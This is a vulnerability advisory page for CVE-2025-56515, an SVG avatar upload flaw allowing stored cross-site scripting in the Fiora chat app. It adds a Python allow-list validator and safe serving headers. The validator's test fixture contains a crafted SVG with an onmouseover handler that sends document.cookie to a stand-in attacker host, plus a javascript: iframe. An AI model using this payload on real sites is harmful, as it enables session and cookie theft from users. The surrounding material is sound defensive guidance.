CVE-2025-56515
HIGH 8.8 · EPSS percentile 38.4%

Description

File upload vulnerability in the Fiora chat application 1.0.0 via the user avatar upload functionality. The application does not validate the content of uploaded SVG files, so an attacker can upload and store a crafted SVG whose foreignObject element wraps an iframe and whose elements carry JavaScript event handlers (such as onmouseover). When a browser renders the stored file as a document, the embedded JavaScript executes in the context of the user viewing the affected profile, enabling the attacker to steal that user's session and cookies and to perform unauthorized actions on their behalf. Note for triage: script inside an SVG does not run when the file is loaded through an <img> element; the impact depends on the avatar being rendered inline, framed, or opened directly from the application's origin.
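The fix on the upload path is to treat SVG as executable content and validate it against an allow-list before it is stored. The following is an added example (not Fiora's code and not the PoC from reference 2): a Python validator using the standard-library XML parser, run over a constructed SVG in the shape the description gives (foreignObject wrapping an XHTML iframe, plus an onmouseover handler) and over a benign avatar. The function names, the sample files and the attacker.example host are placeholders for illustration.

```python
"""Allow-list validator for user-uploaded SVG avatars (added example, not Fiora's code)."""
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements a plain avatar needs. foreignObject, script, use, image, animate, set
# and anything outside the SVG namespace (e.g. an XHTML iframe) are deliberately absent.
ALLOWED_ELEMENTS = {
    "svg", "g", "defs", "title", "desc",
    "path", "rect", "circle", "ellipse", "line", "polyline", "polygon",
    "text", "tspan", "linearGradient", "radialGradient", "stop", "clipPath", "mask",
}
# href is only allowed as a same-document fragment (gradient/clipPath lookups).
LINK_ATTRS = {"href", "{%s}href" % XLINK_NS}

# Constructed sample in the shape the advisory describes; it is not the published PoC.
MALICIOUS_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xhtml="http://www.w3.org/1999/xhtml"
     width="128" height="128">
  <rect width="128" height="128" fill="#4a90e2"
        onmouseover="fetch('https://attacker.example/c?' + document.cookie)"/>
  <foreignObject x="0" y="0" width="128" height="128">
    <xhtml:iframe src="javascript:alert(document.domain)" width="128" height="128"></xhtml:iframe>
  </foreignObject>
</svg>
"""

# Constructed benign avatar: shapes plus a gradient referenced by fragment.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 64 64">
  <defs>
    <linearGradient id="g"><stop offset="0" stop-color="#fff"/><stop offset="1" stop-color="#09f"/></linearGradient>
  </defs>
  <circle cx="32" cy="32" r="30" fill="url(#g)"/>
  <path d="M20 40 Q32 52 44 40" stroke="#036" stroke-width="3" fill="none"/>
</svg>
"""


def _split(qname):
    """'{ns}local' -> (ns, local); unprefixed names get an empty namespace."""
    if qname.startswith("{"):
        ns, local = qname[1:].split("}", 1)
        return ns, local
    return "", qname


def _has_external_url(value):
    """True if an attribute value contains a url() that is not a fragment reference."""
    v = value.lower().replace(" ", "").replace("'", "").replace('"', "")
    return v.count("url(") != v.count("url(#")


def svg_findings(data):
    """Return the reasons an SVG upload must be rejected; an empty list means accepted."""
    findings = []
    # Refuse DTDs outright: entity expansion and external entities are never needed
    # for an avatar, and this check runs before the parser ever sees them.
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        return ["DTD/entity declaration present"]
    if b"<?xml-stylesheet" in data:
        findings.append("xml-stylesheet processing instruction present")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return findings + ["not well-formed XML: %s" % exc]
    if _split(root.tag) != (SVG_NS, "svg"):
        findings.append("root element is not svg:svg")
    for el in root.iter():
        ns, local = _split(el.tag)
        if ns != SVG_NS or local not in ALLOWED_ELEMENTS:
            findings.append("disallowed element <%s> in namespace %s" % (local, ns or "(none)"))
        for attr, value in el.attrib.items():
            _, a_local = _split(attr)
            if a_local.lower().startswith("on"):
                findings.append("event handler %s on <%s>" % (a_local, local))
            elif attr in LINK_ATTRS and not value.strip().startswith("#"):
                findings.append("non-fragment href %r on <%s>" % (value, local))
            elif _has_external_url(value):
                findings.append("external url() in %s on <%s>" % (a_local, local))
    return findings


def is_safe_svg(data):
    return not svg_findings(data)


def avatar_response_headers():
    """Headers for serving a stored avatar: even a validated SVG may not run script,
    load subresources, or share the application's origin (CSP sandbox)."""
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG)):
        print(name, "->", svg_findings(blob) or "accepted")
```

The validator rejects the constructed payload on three counts (the onmouseover handler, the foreignObject element, and the XHTML iframe) and accepts the benign file. Content validation alone is not the whole fix: the response headers above are the second layer, so that a file which slips past the allow-list still cannot execute or reach the application's cookies. Raster-converting avatars on upload removes the SVG attack surface entirely and is the simplest option where SVG support is not a requirement.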

Scoring

CVSS 3.1: 8.8 (HIGH)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS: 0.49% probability of exploitation · percentile 38.4% · scored 2026-06-19T12:03:05Z
Published: 2025-10-01
Last modified: 2025-10-15

Underlying weaknesses (2)

CWE-79, CWE-434

References

  1. https://fiora.suisuijiang.com/
  2. https://github.com/Kov404/CVE-2025-56515/tree/main
  3. https://github.com/yinxin630/fiora

Type     | Target                                                                                        | Confidence | Tier
Weakness | Unrestricted Upload of File with Dangerous Type (CWE-434)                                     | 0%         | live
Weakness | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79) | 0%         | live

Related by meaning (6)

Nearest entities by semantic similarity across the cs-graph corpus.

  1. CVE-2025-65267
  2. CVE-2025-55006
  3. CVE-2026-25558
  4. CVE-2022-50957
  5. CVE-2025-67289
  6. CVE-2025-55454

Sourced from NVD + FIRST.org EPSS. Curated for EU compliance use cases by Adam Lundqvist, Founder at SQUR.